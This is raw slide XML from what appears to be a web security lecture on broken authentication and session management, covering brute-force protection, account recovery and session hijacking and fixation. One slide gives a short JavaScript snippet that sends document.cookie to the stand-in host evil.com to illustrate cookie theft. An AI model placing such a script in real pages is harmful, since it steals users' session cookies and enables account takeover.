          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Prevent Brute-Force Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1578" name="Temporary account suspension:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:t>Temporary account suspension:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>The application should never indicate that any specific account has been suspended.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Instead, a message advising that accounts are suspended if multiple failures occur and that the user should “try again later.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Login attempts should be rejected without even checking the credentials, when accounts are suspended to prevent attackers from continuing to attempt to login</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0" name="Prevent Brute-Force Attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Prevent Brute-Force Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1581" name="An application can specifically protect itself against this kind of attack through the use of CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) challenges on every page that may be a target for brute-force attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>An application can specifically protect itself against this kind of attack through the use of CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) challenges on every page that may be a target for brute-force attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1582" name="image12.png" descr="image12.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375573" y="6394026"/>
            <a:ext cx="4253654" cy="2099735"/>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4" name="Prevent Misuse of the Password Change Function"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Prevent Misuse of the Password Change Function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1585" name="Use of password change functions…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Use of password change functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Periodic password expiration and user controlled changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Password can only be changed during a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>New password should be entered twice to prevent mistakes </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Wingdings"/>
                <a:ea typeface="Wingdings"/>
                <a:cs typeface="Wingdings"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>compare the “new password” and “confirm new password” fields</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7" name="Prevent Misuse of the Account Recovery Function"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Prevent Misuse of the Account Recovery Function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1588" name="Automated recovery function…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Automated recovery function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>NEVER use password “hints”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Best is to email the user a unique, time-limited, unguessable, single-use recovery URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>May also use a secondary function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Same question for everyone to prevent weak question selection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Answers should not be easily guessable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Accounts should be suspended after a set number of failed guesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Successful reactivation should only be communicated via email on a reactivation URL </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0" name="logout…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275839"/>
            <a:ext cx="11042072" cy="6832488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>logout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>log, monitor, notify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>password management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>timeout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>remember me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>secret question</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>account update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>forgot password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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3" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1594" name="User authentication credentials aren’t protected when stored using hashing or encryption.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User authentication credentials aren’t protected when stored using hashing or encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Credentials can be guessed or overwritten through weak account management functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Passwords, session IDs and other credentials are sent over unencrypted connections.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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7" name="forgot password"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="465364" indent="-465364" algn="l" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>forgot password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1598" name="Body"/>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0" name="A2 : Part 2 - Session Management"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A2 : Part 2 - Session Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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04" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1083733" y="812799"/>
            <a:ext cx="10837335" cy="8128001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1605" name="first initiates a session on the target site, optionally keeps the session from timing out, and then executes the steps"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312421" y="8855456"/>
            <a:ext cx="12853117" cy="84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 first initiates a session on the target site, optionally keeps the session from timing out, and then executes the steps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5" name="A1:2017 - Injection…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95409" y="1270000"/>
            <a:ext cx="7221635" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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A1:2017 - Injection</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A2:2017 - Broken Authentication</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A3:2017 - Sensitive Data Exposure</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A4:2017 - XML External Entities (XXE)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A5:2017 - Broken Access Control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A6:2017 - Security Misconfiguration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A7:2017 - Cross-Site Scripting (XSS)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A8:2017 - Insecure Deserialization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A9:2017 - Using Components with Known Vulnerabilities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A10:2017 - Insufficient Logging &amp; Monitoring</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="M1: 2016 - Improper Platform Usage…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386110" y="1270000"/>
            <a:ext cx="5364712" cy="67127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M1: 2016 - Improper Platform Usage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M2: 2016 - Insecure Data Storage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M3: 2016 - Insecure Communication</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M4: 2016 - Insecure Authentication</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M5: 2016 - Insufficient Cryptography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M6: 2016 - Insecure Authorization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M7: 2016 - Client Code Quality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M8: 2016 - Code Tampering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M9: 2016 - Reverse Engineering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M10: 2016 - Extraneous Functionality </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Elevation of Privilege"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3832441" y="1414953"/>
            <a:ext cx="435711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Elevation of Privilege</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233901" y="4266674"/>
            <a:ext cx="3081010" cy="591242"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF85FF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>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7" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1608" name="Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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1" name="4 Methods for HiJacking"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>4 Methods for HiJacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1612" name="Session fixation,…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928687" indent="-471487">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>Session fixation, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928687" indent="-471487">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928687" indent="-471487">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>Malware and unwanted programs can use browser hijacking to steal a browser's cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928687" indent="-471487">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>Session side jacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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5" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1616" name="There are at least three ways that a valid session identifier can be obtained by an attacker:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>There are at least three ways that a valid session identifier can be obtained by an attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Prediction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Capture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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9" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1620" name="if your session cookies aren’t HttpOnly…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> if your session cookies aren’t HttpOnly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>var i = new Image();  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>i.src = 'http://evil.com/record?' + document.cookie;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>body.appendChild(i);  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Grabbing every cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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3" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1624" name="The fixation method means the attacker obtains a valid session ID from the application whereafter the attacker gets the victim to use the same session ID.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> The fixation method means the attacker obtains a valid session ID from the application whereafter the attacker gets the victim to use the same session ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The hijacking method means the attacker gets to know the identifier for an existing user session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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7" name="Session Hijacking vs Fixation"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Session Hijacking vs Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1628" name="an attacker gets a hold of a session identifier and is able to send requests as if they were that user.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> an attacker gets a hold of a session identifier and is able to send requests as if they were that user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>With session fixiation you create a malicious session (one you control) first and try to get a use to use this "prepared / fixiated" session, so you can Access the session Information (data you want to manipulate or steal).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162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1" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1632" name="http://example.com/sale/saleitems;jsessionid= 2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr b="1"/>
              <a:t>http://example.com/sale/saleitems;jsessionid= 2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii</a:t>
            </a:r>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6" name="Session fixation"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
